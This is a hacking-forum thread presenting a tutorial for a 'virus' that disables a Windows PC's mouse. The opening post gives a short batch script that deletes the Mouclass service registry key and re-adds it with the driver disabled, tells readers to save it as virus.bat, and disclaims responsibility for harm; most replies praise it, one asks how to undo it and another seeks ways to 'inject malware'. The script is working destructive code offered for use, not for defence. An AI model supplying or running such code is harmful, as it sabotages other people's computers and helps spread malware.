Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


[TUT]Make a virus to disable mouse[TUT] filter_list
Author
Message
[TUT]Make a virus to disable mouse[TUT] #1
Today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.

Steps:-

1) Open Notepad and copy below codes
Quote:rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
2) Save this file as virus.bat

3) Done you just created your virus.

Note:
Any harm done to any PC doesnt make me responsible as this is just a information which I just shared.

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #2
Thx its alway usefull to know more xd

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #3
This is maleware, but not a virus. Thanks for sharing.

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #4
How could I undo this? I haven't tried it yet, but it would be useful to know.

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #5
I had no idea batch could access the registry :/.

Thanks. I might just use this new info lol
I am currently: 'trying' to make a virus in python :wacko:

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #6
Nice share dude really nice
[Image: ph4ntomnuk3r_zps3b19e76d.gif]

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #7
(10-28-2012, 07:35 PM)Deque Wrote: This is maleware, but not a virus. Thanks for sharing.

Thanks ... mate and thanks for clarifying also ........ :bye:

(10-29-2012, 01:01 AM)ph4ntom nuk3r Wrote: Nice share dude really nice

thanks foe the feedback .... and people like you encourage me to make more tut [soon]

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #8
(10-28-2012, 08:23 PM)MasterTow Wrote: How could I undo this? I haven't tried it yet, but it would be useful to know.

Look up the default registry keys and values for Mouclass: http://technet.microsoft.com/en-us/libra...78453.aspx

You just have to add them again.

In case you want to do this with reg.exe (like the batch-file did), you can look here how to use it: http://www.petri.co.il/reg_command_in_windows_xp.htm

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #9
its alway usefull to know more

Reply

RE: [TUT]Make a virus to disable mouse[TUT] #10
nice Biggrin
haven´t used batch with registry.
-> Have to find some more about it. Is there a tutorial "Best ways to inject malware"? Haven´t found one on HC.

Reply